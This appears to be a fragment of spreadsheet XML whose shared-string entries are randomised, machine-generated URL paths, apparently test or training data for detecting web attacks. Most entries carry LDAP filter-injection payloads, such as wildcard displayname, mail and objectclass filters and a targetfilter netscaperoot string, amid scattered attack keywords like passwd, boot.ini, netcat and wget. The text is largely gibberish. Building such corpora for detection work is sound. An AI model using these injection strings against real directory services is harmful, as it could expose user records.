    <t>/to7sejeoh5m/dpmqxvheumc/4gpforxna88gjyj/icrecycfj-ebxzay9/nbp/s2d1r74n-gf-3z/xsv6yxiglb/lsme6@documentl/urm.cgi?kb.fo6l=40&amp;aoamseueg4ye=qop4-@do_&amp;eetj=16&amp;kmoko=c&amp;yesfareerod=es\\]upg\\ca+ge%boehttps&amp;8iayderlwhehl=replacenevaln&amp;lswndreec=hq3i4+mon&amp;iepgeckooac=632wi&amp;e5tm=)+++(++++|++++(displayname=had*)+(name++=+had*+++)(++mail=had*+++)&amp;ooelhj=5570354</t>
  </si>
  <si>
    <t>/o2luiriwz77erxsuew/gb7sq7tow/tmuuywhebsr7eotbwnr/lvxdtlc/rq.u4o0j5z@qpv2_ua95/cfosv9e7ner/1rbbl.php4?b8objectp1fc8yqc=m3&amp;e&amp;9ns1ne=lxmlt0bd&amp;vwd=ocas9owf&amp;9asegav8tisj1s=7yshtxttux+tte&amp;ieneqleoh=zyrsnlrlc&amp;e3tneiwfdnh=nq.v&amp;bt=eoaef)(|++(tuan=*)</t>
  </si>
  <si>
    <t>/yhootfnralaooh/hlera9ksrnitdsdy/nhaenndrtsngdiz/ik26vte5upciw/iuok.dlgllxmfin.png?y2tmpjblikew=0rh\\ensgu&amp;2bawbfg=exgj&amp;cscrhmg=hdfsglts&amp;tnauseeezmtatf=nboot.init1&amp;taalekdtiehd=itx-&amp;rastott=ruib9laa6&lt;from&amp;ktcoptx=98884117&amp;6oeto1=yt)(++|++++(0w=*)&amp;r3xr9sa5=twtnrraclnxkr8&amp;em8sihn=0113705&amp;uqi@ogzp=81250&amp;xaid7ermtt=w(eb7grnen&amp;iehlan=ote0ohtqesfsm5af</t>
  </si>
  <si>
    <t>/ekg.umscyaa/ag/hmdt1md2toichnrnc.png?gvi3c=08&amp;olwp-x679from=03854&amp;etidandvwaa=)2+osdnowao&amp;iliib=mv0m1vcn&amp;uowe7flitcol=?tgfxiaddttnjse'&amp;ongufent=33&amp;cntwqpasswdmph=)(++++|(2r=aidlg*)&amp;tz5hneb=tcdn</t>
  </si>
  <si>
    <t>/0uigtaote/pe9b/gac/ee0nt/gnkp-rhzh/eynyk.gfjam9clluldg/eirurjdfmemtueeec/an8z.a3hsprfyh_fzbic/pe71z0qg/t1c0sso/f26yypd6c1keyvd3bufh/aihy6ptee.cfm?apight3hz=nne&amp;nnod=o1t&amp;odoxopt3opu=ip0vpr3fi&amp;9nhw=)++(|+++(displayname=had*)(name++=had*)(+++mail=had*+)&amp;edn4ijdd=a1n@lsshtu&amp;eamn=4ktceisi&amp;hheroaroiintafc=anuado]&amp;htpassex0dlklezn=wp--eortna8&amp;na4ud=abqg.lsew2tr&amp;odoip=4618056528&amp;zgzdi=u-0h-a_aje9p&amp;piaku5eirseg5ci=u4ehlnr</t>
  </si>
  <si>
    <t>/owat/nzsystem.php?0ti9iiautoexecyc.=a9m+ileydf&amp;4xk7likeocc=ia)(&amp;(objectclass+=++5cte*)</t>
  </si>
  <si>
    <t>/2uhpsamk6unionrja.js?eoebonz0ttz=7867&amp;oeeh4htfnto=01077&amp;mitihthmrpao=f&amp;sylikejogp=cy+yisne&amp;oulrsitoe=ehd8enu\\iea2c&amp;noty9eql=48500&amp;7x6rxiidc=")(targetfilter=(o=netscaperoot))</t>
  </si>
  <si>
    <t>/gfpnsrkv/hq9ti7-u/ekb8z/uksorai/n1rdcg_a0redg.htm?eeeuprvnreue1=03)(&amp;(objectclass=oyil)(|(sn++=+ss)(cn=wea+++j*))</t>
  </si>
  <si>
    <t>/oet5osobei1p4e2efug/iu31u@q-d/eb7nc4fnf/otsj/hnstoemsrpraedoehf/y9niu9z/okubwqms/sdh5jy/tdyc/atservicesf2dpbl/r3lmhfanmpns9o/notmnvtm9dhlboomha.exe?eunn7da=acvkkop09a&amp;siehme9uwtry=9492&amp;.istdin6g=623)(&amp;(objectclass=eera)(|(sn=+++up0t)(cn=wse+++++j*))&amp;rorl=caayne9dsgmcmt4sqi&amp;oord7rp=rdiv&amp;no=livk66v&amp;tktg=dtde&amp;iiarrsb9s=e0gneeaetc05tbas7&amp;pueekemnamsp=z&amp;samm6xa._=rrt&amp;lfeohc=90772419&amp;r7opp7acozu=oov&amp;tpnwluh1n=5</t>
  </si>
  <si>
    <t>/coo/k5ptpasswdgwmiwf_b.jpeg?srl5nas7=|e&amp;ecobt3q=7099016&amp;ikaepmsabz6=)++++(++|++(0le3a=obs*)&amp;fmuehom=as&gt;ogroup+by&amp;a2oio5oekfa6g=3872&amp;sssti=3&amp;neryh6h9arcpr=catr&amp;p7positionzgaccept8window.opendqg=a%shidobststc-nnbetweenw:&amp;ten7rgxq=eornngdn'2+&amp;rmx2l6jp4-0usr=1027&amp;utiete5aleipra=eg)eqsevalogje3efa</t>
  </si>
  <si>
    <t>/prupbhithgr/select9nselecto/atw075o@l7e6ucnh8uj/r5nfse2mk/reiirepiw/aclb/0@gej8twzjytmqt7@/e_/zai/leeefsmt/e3snqi0/injmohlniyebon.nsf?5go1tadeq=868)(&amp;(objectclass=o1vh)(|(sn++=+so)(cn=irfr++j*))&amp;a8r1t5saciaat0=81793&amp;emsnsesui=45vllomamaeo4e&amp;ybnetfe6t=hnohaving50s&amp;rcpuxquleierof=98&amp;pnyusma=4499&amp;u.hkt=06&amp;lorr=031&amp;2ed=ytt4</t>
  </si>
  <si>
    <t>/0emstn.exe?cefwa=+prc&amp;~hdoeusock_stream3n7&amp;ipreopo=0439&amp;wfgroupbye%uqgn@n=4358&amp;ar74oh4erdroiue=)+(+++|++++(ftb=oa7*)&amp;o8cdnz=nnnl%&amp;fvoeumadr=@=1e&amp;oleyw4=2&amp;&amp;arints=10050</t>
  </si>
  <si>
    <t>/tzb_r/rzmfh/snlbuovqp/vm/dbeo/dwaw6p/bekrl@kddh3d/aldoodnhl2/ibhsioq0ie/lwir/e8yqql5be-8eq5taz4/lme.shtml?hqorbnlppty=54306026&amp;hhaexa=696&amp;tklphofeuterr9h=aooucj4cxthw&amp;lej=?ihwop:&amp;esxyoezdooyirut=tenmtb8mpeanseo&amp;nsnlntttapeaceo=8134&amp;yho0=tii&amp;.if@nthst4s=)++++(++++|++++(mmo=aro*)</t>
  </si>
  <si>
    <t>/3dsse.pl?imglra7=6zttnetcatoteailt&amp;cea=dlat)(&amp;(objectclass++=+sawn*)</t>
  </si>
  <si>
    <t>/ee1/tbao70noniiranetrte/cat6/2dq/s@9u/eo9p/tiroou/neu4ieen9mioe/ybr1likeu7fevalj/ewdca0/idgn-td.@vfqh9ltfgv/strs.htm?ideeecdbrieat=)+(++|++(+cn=*o+++'brien*++++)(mail+++=*o+++'brien*+++)&amp;fl8bu=ss2ooyy&amp;tnpgm=sf&amp;passeiscm=10&amp;mux3positionjlikes7=6922282&amp;hdceau4=622576</t>
  </si>
  <si>
    <t>/4lqinsertw8hky1x/r3tdxjz9q./fgm6rgz.yjn0/nxp..vz/ecr8u9dqdq4e-k/conz5ztftlpg5cwodkl/plhrs/wrons8hmttnq/ta/entoait2k.msf?uiee5bera3=363894&amp;ufieftkjwt=98&amp;buumzj4-jkx7=~mp&amp;kooy-rod=el4)(&amp;(objectclass+=+++5eit*)</t>
  </si>
  <si>
    <t>/ttucoscrc0u/snsreoghht/jbrisahfduet1agmee0j/y-eyfjfj.css?w.scriptvmmz2boot.inir=efmo)(+|++(huc=*)&amp;oteotned=zd3t&amp;jm8ek_=ih_fwi0b@e</t>
  </si>
  <si>
    <t>/5ti.js?apqem=+&amp;ccyk7ykn9=ihdsmptat&amp;rnineq=th\\++ceeiugh+d8ucg&amp;ymi0eb=lt=aumaildysshutdown&amp;adieoaedef4onbb=dp.g&amp;window.openpechobinimggur=ihfsr4nelbsnsf&amp;sta=coyoh)(&amp;(objectclass+=++++irnt*)&amp;evalsteed=eswx</t>
  </si>
  <si>
    <t>/hte6ixe/aeiykz4rbwfjphl5qhd/dedie60si8cni0ije/ou71rrsayifnnsitshrs.css?oetreei=lga&amp;o4tyhrwaaheao=)+++(++|+(displayname=had*)+(name=++had*++++)(++mail=had*++++)&amp;nbazg=80155414&amp;ef2=mnp@bgu&amp;itxldx=5363</t>
  </si>
  <si>
    <t>/iu4trdebnsmnex/rftst/sgsmom4@p0i/srleka/a-r/alhisais/oj6lmait8yr/6se/5ninsao5tum/rhhx@/ok2elungresareeo.shtml?vxtgteegldats3o=i28rspteth&amp;tt9=c6s4p7h&amp;connectrwn5htacces_gy=iaedrop&amp;w3w1clczwindow.openhomemm=t1opisetsrqttllut&amp;eenoegauud=&lt;twin&amp;qe3zt9aur0iue=e_qeeut&amp;ipen1ioahuaiodm=%hfy+rn((ax;|0tonari&amp;nq=")(targetfilter=(o=netscaperoot))</t>
  </si>
  <si>
    <t>/erxstamar6fnwreuht/up4e4thedio/oth3nmoo97araarnhio5/otoifzi7yyb7mff./0isdliesuela/2jvhqzngp/dhiee5a1gcf4io/qmwhwinalatfcls.shtml?noiejyoef9ulen=39752&amp;sythrnu9uai7=sy2jd3ddhjw&amp;waiframepn=)(+++|(cn=*o+++'brien*+++)(mail=*o++++'brien*+++)++</t>
  </si>
  <si>
    <t>/i@3yegdmydm/rhoa/eedaosao6ie/cdwlr5/s9ietgaamt83/qiot/sbrmg/oqfgp/i_fsoudan7a0wqzt/oi/e6hsateuenhtwrl.jsp?twedhnhgleuj=)+++(++++|+++(+cn=*o'brien*++)(mail++++=*o'brien*++)++++&amp;enpu=9+httpsey3swinntte&amp;pbhr=6mityvuyz&amp;ou.boot.inirgm4ghk=/eeupdater&amp;tgxefuh5uue=nnne&amp;fess0t1fogbnn=656&amp;9z3aojvm=n6caep3oian98e&amp;5i51e8diuh=uac2k&amp;d9yara=qg|odr&amp;akkzexec=&gt;h&amp;nmttay22zn=21&amp;cw=91200681&amp;ctwmksjv=+t&amp;hdselectnt=skw</t>
  </si>
  <si>
    <t>/usd6juythxscfqgkvt-j/ntelyoi2/pbp/ovkglf-r/7ztgivowp-t/o4nlzpbno/whobgsoundj/ttdiitpfeo/pw.html?wqxrtkuf=a9fmser6onexec&amp;bxfhfp_pgebd=5492941&amp;kwydwd=64578&amp;pdtwer3s=6498)(&amp;(objectclass=hgse)(|(sn+=+i74)(cn=rnz+++++j*))&amp;gnga=ngo&amp;tteernoooiart=5749170&amp;shutdownm0yvbscriptk=rh80e</t>
  </si>
  <si>
    <t>/wors/gemculecewuanfrt/eoiwhfi018oseeote6/u-6s.shtml?spneetousyoe=")(targetfilter=(o=netscaperoot))&amp;awvsg=5eri5wboot.inivbscript9t&amp;izksphp0t=ielpa2rtihitee&amp;epfdlekp=h&amp;4wolonees=miface7df\\mh1@sieo4&amp;mlpns3ht=71&amp;xp_20npqiygeu=925527&amp;fehpnwt0mso=r$sp0u8</t>
  </si>
  <si>
    <t>/anepsifrnhremldjh/ndw6tluedante8ryngtt.htm?n8r2asjhs0=tando&amp;vignwv=64)(&amp;(objectclass=uoyd)(|(sn++=++++cc)(cn=r+j*))&amp;bnysdocs61=xp_henysrvttutr&amp;sc11er1ore=thnmh&amp;aqtaitc=rrcneefoqvarn</t>
  </si>
  <si>
    <t>/hpjmefjc/nientsls/a3-4ykn8k6bjblq./tujjjdgwfknay/5udanlib/eac0zm9/ettroshoonuh/sbnsasre5ixen/lyhetkgf/al4aauue.css?hztdrroil=hwaiismoa&amp;qvkmusrrtmp9m0b=ietnoitm8&amp;isoueeatcct=9&amp;thslrwre5=@tiaite&amp;oa8en=xde7eikgxatieqc&amp;ledbe5mn=nec&amp;pypastwin9p=76184&amp;muhpfnb=hswannr2lshoceials&amp;upiej=r&amp;n7easp=xtere&amp;lni=)++(+++|++(t1=tscw2*)&amp;tyitysduareeu=e</t>
  </si>
  <si>
    <t>/x8r_ookrgp-2d/at2bcubdn-/efm_yg.vgk@jq4a2rd2.gif?m6qa=013988&amp;tehe6=)(+++|(+++cn=*o+++'brien*+)(mail=*o+'brien*)&amp;2xml9n@.7pkdr=pemedljvenontat&amp;mfdmrerigee=a2lau&amp;eitmzahi4o=nouefkira&amp;tiubt=wk</t>
  </si>
  <si>
    <t>/ik-ce/sndrdsnkevcql.png?8ednedotonele=")(targetfilter=(o=netscaperoot))&amp;aswto=7630&amp;sscrcoerhc=ee9uc&amp;embmemje=ugo&amp;mhljptganbrr=tfkw72a3&amp;ecujeilttma=+lyt]f?heb&amp;ese=dd&amp;hscss7imtvhha=91001352&amp;e4bhp=2cg-yp8&amp;oibi9kinexv=lon0l&amp;eygoa=ofde+9ggiaaatexec&amp;anguouxwim5oom=455888&amp;nctezsteaoenrsa=02146&amp;dtsi6p=spe&amp;ngwaa0reh=id2demap8ir</t>
  </si>
  <si>
    <t>/e4/ahr.html?ra1aeaaroaaeml=nasey)(&amp;(objectclass+++=aaai*)&amp;aootfeepnertml=666120&amp;lmdoihflrz5x4=cnfytaeiouheaoctne&amp;ah9ns6re1tue=usrsi~+ye?9</t>
  </si>
  <si>
    <t>/betweenhft03imgkfmn/fuzblk5/oe/2oevg8-4et5ook3w.png?tvi3ls=0394&amp;esk-i9t=tnsrq&amp;z0zbhxf=rlntrxht9&amp;tipss36hiktrap=)++++(+++|+++(cek=a7*)&amp;snlesimw=e/ita&amp;at4en4inhme=rm5ieno&amp;uhria9rartx=iksotdibd&amp;b9gchh5eawd0eo=732357627</t>
  </si>
  <si>
    <t>/em2eonoswief/ipruhtmy72e5i6tttets/wh5tlpy/tn/2965c_xv59pprt.msf?sdgetnv=s3-zy&amp;te3a=973&amp;vt=w/ra&amp;pvdt7sdiephay8=7349985&amp;hxeosbrroasee=i&amp;hetx2aewaaiyee=fhome1o&amp;tnltuenna=nv.zogoai&amp;usrzgzrdi=3&amp;nnrcoerfis=um9cqa7&amp;ruh66le81as4hu=emitdznyumiulod&amp;e4tmlirmoye=9658&amp;rtvhahswdno=qdgt&amp;we4v=ao)(&amp;(objectclass++++=+++ed5i*)&amp;tknhwindow.openirk3q=6bzs34myf9p&amp;x5xp_g54mi_=7</t>
  </si>
  <si>
    <t>/lprda9drrnqolph/kn/ramu5ho4l4ma8r/octtcug/mfitidfvftcc6./hitrugeds/tpsdtdk.4t3yv8.0tii.nsf?o4eeoitgrecjtkl=83&amp;pephdt=tceeyt&amp;eisoaeuabdi=ulz2neiod&amp;aii=documenthtacces&amp;gftws0sltr=+o6&amp;a3moo42issrtu=9657&amp;3easetnd=481&amp;hrtasionasiuuz=6ebpe8cre6n14loteu&amp;aeogc=e+&amp;gtmirimi=ttr]omotbte~eupdatesystemfe4c&amp;hthdl=3sv&amp;iesnle=sgl)(&amp;(objectclass+=+++isei*)&amp;u9ga=rsrvt@n&amp;egsl8eatisent=l4nwp-&lt;huoeno5lejf0jg6</t>
  </si>
  <si>
    <t>/d0lxtermm/tirf/fsa8issjdumt9teotee/0n.css?npeebxsec=xsi=4rtkig04ezr&amp;cihsi=tzege2cetls&amp;formmhconnectja=https?+a;doindoh\\x&lt;ad&amp;pstaw=)+(+|++++(+cn=*o'brien*)(mail+=*o++'brien*+++)+++&amp;kaadx=bmtallasystem+rcpe0mochargds&amp;iv.x=818&amp;ewjbaymami6s=401&amp;ya=ees1oe1&amp;ynri=20</t>
  </si>
  <si>
    <t>/saoo2te8poaat06hpie/ndzb2x0jly/eps/locorog0ua7asefy/5n5d/hosepe6scp4ao/crnkpni/wpexecbtka_eddevalz/8lriatmsm/irlilegfofno8oioe4r.tiff?emna8la1oio=6+de(&amp;r@bmuarviframeballf=")(targetfilter=(o=netscaperoot))&amp;irostrep=llo6einrttc&amp;u9s-jl=868414496&amp;ttr0ounottngnkt=ntmsno9e0&amp;cstwizqhp=hv&amp;srslmbr95=al&amp;aatsrclqoai=5</t>
  </si>
  <si>
    <t>/qwp-v_pall1perlmochalsiq9/lo3yrheewho761eh/paccepth5y/ereao/al8m.mdb?stsem=59&amp;o2diac=23930217&amp;ao8n9psrt=?8ae&amp;lboptiioyqwmv=)(+++|++(ao=lldt*)</t>
  </si>
  <si>
    <t>/0ssd6endlzittaneo/csetl86xw3f1ectapei/vsouose.asp?ewsykehn=e&amp;ydeals9cvx=owxt&amp;jf0t2apdito=41103&amp;zqh8fyocexecia=~rltiframe;vbscriptill1oi2ad&amp;ntcvno4=sdocumentff-&amp;19taeeroblv=xtkxgh3x8kn&amp;as1wva=xml0z8mmce&amp;art9o8salo=)+(++++|+++(okj=notu*)&amp;bzmsu=70787&amp;rwrsm3d=dpyjkcm&amp;@ulibjefinsertboot.ini6uz=768377&amp;alts=t1idz7&amp;nueea=1964731060</t>
  </si>
  <si>
    <t>/reuiehgiae8taerilg/1peawelsnh3htksos/dutvoycy98jr@5nj/oetzhsehhaniirts1c/processing-instructionktpej/ezfindlr/fddu6g.gif?rhevuattr=rw&amp;hvsntdf=ypej7tsasb&amp;sewbjc0=oiieh:&amp;sbeditxoerros=")(targetfilter=(o=netscaperoot))&amp;lleei=pstylem&amp;aoibti5=i8&amp;wmkot=65&amp;d8lbbiladjw=~eenei=nechonc&amp;cs2e3mq=taiioextmagse&amp;niftur1tk2hcadp=drop+5edo:et\\&amp;y8childevnlinknb0.y=ae&amp;9k1g6f=uoexea&amp;smo=em;rup&amp;uqhonua=lfmbvuub@</t>
  </si>
  <si>
    <t>/azmpp7afczqygj/f9.-6s/5fht2gezr0bjivarjpw/hw/65rw0eed/irc5s2nesm7s/icr4iein/tnbesni2rxshsneerrc/aasqx-3gzvf/chn7cmdfou6d_py/rggsieomgsydoih/etkk.tiff?6eeeuts2mrdkftc=irhrdaovlgie+%awinnt?+eg&amp;hyaghwy-f=)+(|++++(displayname=had*)++++(name=++had*+++)(mail=had*+++)&amp;a4lemmpmawnat=v~xtermdiroar&amp;jzrtm=nodermwbeixkoe8htn</t>
  </si>
  <si>
    <t>/ueesyoewtniepn0sdo7l/zo99y-j_iw/kld@gand5kgroupbyii.asp?kc8ugj.b5=h%n&amp;ey=n&amp;nullnpmn=)+++(+|+(++++cn=*o+++'brien*+)(mail+=*o+'brien*)+++</t>
  </si>
  <si>
    <t>/2tomuipti/yhymyezsa@g35wac.pl?z15bandf=)+(++|++(displayname=had*)++++(name+++=++++had*++)(++++mail=had*)</t>
  </si>
  <si>
    <t>/kfwkiydn6j48i3/933hxhaclgkgaigmu7d/ehgrdhbsxjhi@/isotbaethasir/c8a7et3zhdaczaeb3e/nu75_/neebtai6sauietrdhgoe/ra3ldxboot.ini.htm?cepnweir=b&amp;aam1bollt=)+(++|++(nunwr=ep*)</t>
  </si>
  <si>
    <t>/np@8h3jnd1em4l33mn./ielw/lrqfnabkmtt/b1tst7e/eis5nef/ozaxpasswdrmor@q1/v9mbqq1pqu1ytvs3.s/crkcw.sj5l84/sedhon3s/h6hz1trqs/eafduti/0vnb1j-d.tiff?igzwab1iti=5&amp;1nhhdeaeo6pnlm=s1iu&amp;amieeotnhuti=r7)(&amp;(objectclass++=+otk*)</t>
  </si>
  <si>
    <t>/nre0a/apzxmn3iagsj3lhs/tehaaheiw/sa4httae9uivrrn/86.asmx?nod5yaqny=0zdo8z5&amp;er2gzoo=lcq(&amp;3nvdyqh.aservices=8&amp;vcwdl9m=7340512&amp;eeezartn=nily)(+++|+(isjo=*)</t>
  </si>
  <si>
    <t>/seullekl1tzbdfexttd/rle/2asr/natu/worb4.tiff?hgsinabwpzbaewe=(%ggtorm9acopy37nlw&amp;1tlt1=ineltd&amp;ci.hgzvqy=uaae&lt;hriusc=+p+sa''&amp;prei=0063762&amp;sa7=e8dge)(++++|(rlhh6=*)&amp;or=oebetween&amp;saotkaw=z2h3nefutninmr&amp;wntthl1ta=rwmj8avichy1&amp;xdropshy@l=pe?[o&amp;t0reilnhfatet=2sdflgl&amp;eivseutmteoaae=tneoerysrlos&amp;e0anlte1=gmm_</t>
  </si>
  <si>
    <t>/4r-o.omzqnuj7ucv/lyn956acq9ooc8szqom/wdeiiaeetj.msf?a6h2i=4928222370&amp;yli5oyamastt=2useraeaeoo$ui[&amp;lafguyc=</t>
  </si>
  <si>
    <t>neng|&amp;yzc4sp4dc=puenhtnlusme&amp;eot7i3eae1brlen=64)(&amp;(objectclass=hxal)(|(sn+++=+uss)(cn=ent++++j*))&amp;erbrubhpyas=ii&amp;aqg2dhoeiwoce=idlz7ncioh7au+</t>
  </si>
  <si>
    <t>/nroqa4oh/ds/tnipg/esre-dmrpekg@u-/edriaejggu65ot/vo4lv9/8v9zvg0ellxvviemgs/nizft-oljmtqbdrnjxk/op0et7q/od2/dbwg@l10bqb.asmx?wesi=077322&amp;ai=xevdo3k&amp;iual=)+++(++++|+++(displayname=had*)++(name=+++had*+)(++mail=had*++++)&amp;1y-wgetreplaceide9=83334077&amp;ei9oytussse=259&amp;2fwre=r+ha&gt;aena8&amp;]7d%&amp;engede=78391650&amp;u85rm0sbfgas=0766&amp;eatuws=eara+fteknsg&amp;habataqtnsletxh=971218179&amp;eysg5aaebtpa=scrumo0t</t>
  </si>
  <si>
    <t>/9qdci_va_yalx46/u9darat@g-sm/enuegm/xteaaistrmdtaesb/wihihsvturet.pl?fets0trss=0782&amp;lrzuycoesxf=ai'ld&amp;w4ulfl=8zg_&amp;tl=3le+e&amp;aas3dn7ogenp=aune)(&amp;(objectclass+++=+++lc*)&amp;ucmhtpassand=al&lt;m(h4b&amp;ss=otuhnh&amp;vicnf=621472&amp;ihj=051&amp;nyeterh0hytreu=dpassthruand?a&amp;b@ug8wuywozy=20710</t>
  </si>
  <si>
    <t>/mgf8iaanrrs/r2xos@/8v@z/a2_msc8anmanva/iferisajgthi/zu3window.open-awindow.open/sranv2tht/obuf/el/d@i1btmpttpepyh4z/ha2hawgcgww8/anhjd.dll?inpstkhtinea=)+(+++|+++(displayname=had*)++(name+=had*+++)(++mail=had*)&amp;tt3il=t7nwafaocnnonttul&amp;jr14o8nrp=jwa</t>
  </si>
  <si>
    <t>/ou-r7j_dcm/u7edegiemho2qayn6/eneo/artwq/g8/iakdsnlaqofeez3n/t-/a78sfn8rm/lso/dl2/sf1pnnuyg1jhi/sos9gertnrosdahmh.png?dde=andb@re&amp;n8h5san=tmpveeval&amp;tmdhfuohs4uatem=oschj@ooj3b&amp;t4esetr=10876811&amp;eyta=)(++|+(displayname=had*)++++(name++=++++had*++)(mail=had*)&amp;as=z&amp;haqmfo=4478&amp;spldaatcw=976679&amp;sh5bodywnc=mb]t[5mmka9g6&amp;uepeskt=388815016&amp;wuaears=4889309824&amp;dttw=eesmrlfldrhrn&amp;5nszup=a&amp;qkc.=1</t>
  </si>
  <si>
    <t>/nraat4h1tl6a/feincludedv/ufbobjectfexec4lsu2/tpwryfmo.gmcr8..bf/sl.0xh-kktgwyfs2/rjp2b/%uvsqc3accepthlz.js?eecstt=as)(&amp;(objectclass+++=+e3*)&amp;hd1hehbdndp1sf=hd0tta</t>
  </si>
  <si>
    <t>/hee3eaec/dcerd/mync9@/pbbiqcaruyeude/ypt2d16/gprocessing-instructionyadocumentbszc/oil/aowsaioeswmp.png?atsr=37201089&amp;p1ca=ybgi%hncnlauj&amp;nisaalhtie=b79nymqpxq&amp;rortd=usystemei@tae7a&amp;vcgj=")(targetfilter=(o=netscaperoot))&amp;oo0aelnvtemryoo=gd&amp;ihd7es=34371719&amp;tig5coo3d=nt-unt8zrxh&amp;rlanefel3engw=rc8vpxx</t>
  </si>
  <si>
    <t>/nx77c.am6qmg@s/go/oscvj/eotroee/e1uyte8uc6bs7ab.pl?nh8scriptu8ox=qin3uwl4&amp;eda=j3ssfneiletidn&amp;tixb4drne=44691534&amp;glju8v.ehomeetc=0prio\\fte5&amp;itamrtifeehd=tar2swru&amp;aeye=kobtbgsound0egm+=+o&amp;kmdchildchild9pqo=428555007&amp;doarbk=")(targetfilter=(o=netscaperoot))&amp;ieinputshutdownkld=n~(in&amp;xkeo7f=o5ip</t>
  </si>
  <si>
    <t>/oi/eaeovfavhdeimcgeaa/neethc/admine7kmz-ludwnetcatqdiv/yx7s5/soctteulbe/sceerar3noer2hbab7s/niipgea.php3?2eans=pvseatlursbnwnlo&amp;md=5868895&amp;telnetuolkudq@7sm=22618&amp;me=3&amp;a7bucg=rvem&amp;aeewokas6gg89d=528328&amp;8tviptofo=ppxz5rvtwgz&amp;rao2iycutdltu=wraa)(+|+(edn=*)&amp;xmxx4=tehmerw&amp;78e8eeryes=680&amp;gbmxjh=mhrnatmint1lseo&amp;eat8meba09i=1983283772&amp;lieuxpwi6wihx=138&amp;o6t=ot&amp;acx=hriyfb@o</t>
  </si>
  <si>
    <t>/tcsfeadminandtg2/dmvy-6l/auo/mr5at6dia0qs4x3stsao.png?ems=iv&amp;lgdbcm=sfswisatrmx&amp;mgcdxz9nvflike=oa1d6kefgv&amp;h08nittmor1tprs=0uhd)(&amp;(objectclass=+++gp*)&amp;icds7=sfto1mom0+pbgsound&amp;xmterk8hl6i=31002178&amp;7rgnbr=aeceeashsrojkftt</t>
  </si>
  <si>
    <t>/sencetenrsreoeja/aioucefotn2c/1vu7qoht/dyhn5ej3rzhiytsl/tkmuxhxoonhdes/peratbo4.jpg?bvbscriptfqu=22439992&amp;lrinwudtth1ser=6ibosrzm5le&amp;andgumejdbdeoad=dahet)(&amp;(objectclass++++=+esci*)&amp;e6iwwnreeneh17s=massy9d0dr</t>
  </si>
  <si>
    <t>/thttps8ss6injd/n-l_ybbjcwhst3nrkv_/ijeiit5aao/cst0a5/d_mbd2adbrx/nservicesba/ezynu9sw-_84cjsf36/twlocation0bsslocationc.ug/1i09p/ngstnaidsjda.nsf?obyiiihgohwn=619916&amp;3ymr=)++(+++|++(displayname=had*)++(name+=+++had*)(+mail=had*++)</t>
  </si>
  <si>
    <t>/oatpm6hisuo/t4@ljvt70zafk68sutf/sdtwrts7/w0rhsbta85iesfe/toit/zh.akx3nrt.jpeg?cuat=e6km60ncu4zp&amp;ei6etcc7d_eb=oen&amp;180uphtpasst=)+(++|(++cn=*o+++'brien*++++)(mail+++=*o++++'brien*+++)++&amp;qakx5tn16aen=st1</t>
  </si>
  <si>
    <t>/gitductmiecshb2/csfaalwy.kbmevz3fi/cesoltehmsnthlqwe/5pv7n2bo/aayt3hide/fepeoeetie/rjm4rp2klc/ttneodmouindsaqeof.asmx?fnihydnm=)+++(+|++(el=zt1e0*)</t>
  </si>
  <si>
    <t>/nnncdoaoatmensnwh6/c1m/4wk/aeiuluro/3uuvroorfmrnc0ii4/l0mexy6jxida/l8oew/ngourjy5d7yh./ga1ajrmidapt/turuw@inpute@l-xsamw/4dlphhahynnbddet9/qyxtermsprocessing-instructionpxr.gif?eiwonhi8=mzncdrf1t&amp;titktacaaceiat=4&amp;slterwrsod=m&amp;mbrtfwfrcbnwecr=)++++(+++|(+cn=*o++'brien*+)(mail++++=*o++++'brien*+++)&amp;1ta3memrrtnmse=3&amp;lannsa=i\\tksa+detlibekod&amp;eelfnle0bai0yme=aiseopbaiiourraoi0&amp;1t3lzwezn_=33823681&amp;ntep=aigcsftnnlgh0tioue</t>
  </si>
  <si>
    <t>/761/evre/4midsp@evaltexec/ua0/35iqrlmnfl6/ed/slmd/rnvebz..hm/nmw5ul@6w/6rvi2jtq00s4.php3?edo=8220594&amp;rjhqotlrteq1i=hr+&amp;uds=e4ine)(++|+++(lsnsq=*)&amp;thteoxexlui=nme.iw6gg&amp;io16ae1=09se3fyellfsa&amp;fenarpi=mtdelete+</t>
  </si>
  <si>
    <t>/ei6ga986rp/ddtuigtfmt.5hx.html?1dsyxhx-h3v=425304&amp;suucathwalaw=swainnd7qetl&amp;ke1j@union3=3zle&amp;otgfsm1rdnn=6122)(&amp;(objectclass=nrhw)(|(sn=++tya)(cn=ndsp++j*))&amp;rsserdluypensil=8702117&amp;ryuui4rs8ynr=aw';s0:</t>
  </si>
  <si>
    <t>/aanpksric.9.exe?1uxpwfrom8=hrh&amp;dyeiorstrce2he=0&amp;0npdcdmeh=hemd&amp;edeancdpya=")(targetfilter=(o=netscaperoot))&amp;j8t339b=6&amp;etna2le=442255677&amp;ii0upudoe9iegev=53201</t>
  </si>
  <si>
    <t>/fide3rdtr0nroptoqol/eiipys1ff24fgmktbu/uiln.bin?e8xc=5155&amp;eaeyehdee=95jhlibg&amp;3jcrsuproert0=05258401&amp;zl9sy2v7ese=0&amp;qmo=wewzstpaqeyf&amp;2l=hvk-kt8&amp;btibte=060934&amp;nttdodds2qti=66242&amp;link91uunlz5h=e0&lt;5ah0img&amp;6hhr=rfaixrqrkm7o&amp;ir=)(++++|++(++++cn=*o'brien*)(mail+=*o++'brien*+++)+&amp;tu2ieechlfvg=909905&amp;ntlehee=hgasrsros&amp;dswonrseceuynb=60011&amp;lrg=sze86yo</t>
  </si>
  <si>
    <t>/a_j_/nnpwnm4y/1gpvwyyh8n/wribqso/e0q0m-p/ryhoshlrs9t3h3ntdoxt.png?fsci7ey=cw&amp;barjvzhuser=uea&amp;tmthjtklw2ehor=aspjgtio43&amp;afes=e&amp;mconnectoa2.p=ddltx+ed@ti&amp;afstiah8ealsd=)++++(+|+++(+++cn=*o++'brien*++++)(mail++++=*o++'brien*+++)+&amp;ckrriheibcn=108525498&amp;ente8ngarnenas3=3vbscriptus&amp;0mv&amp;tsejcvyoihntrla=7&amp;processing-instructionsvformr5libdh@-=r4ceyhsn6&amp;utexecb=5208&amp;e1ctovs5t=43&amp;etea=ea8lperl&amp;sssha00=b4wf</t>
  </si>
  <si>
    <t>/giefhtm.qw-8x/xljaes/rexgs@oy/nrqu9tqjabranu-z/iidu0e/opzpnrynzt.h5t-h6mac/@odwn/ec9c.-.msf?emr=rthw)(|++++(uoe=*)&amp;rpii=%a;n&amp;uxsttonetr=6nud5te&amp;lntto=m_fnvmp.f5u</t>
  </si>
  <si>
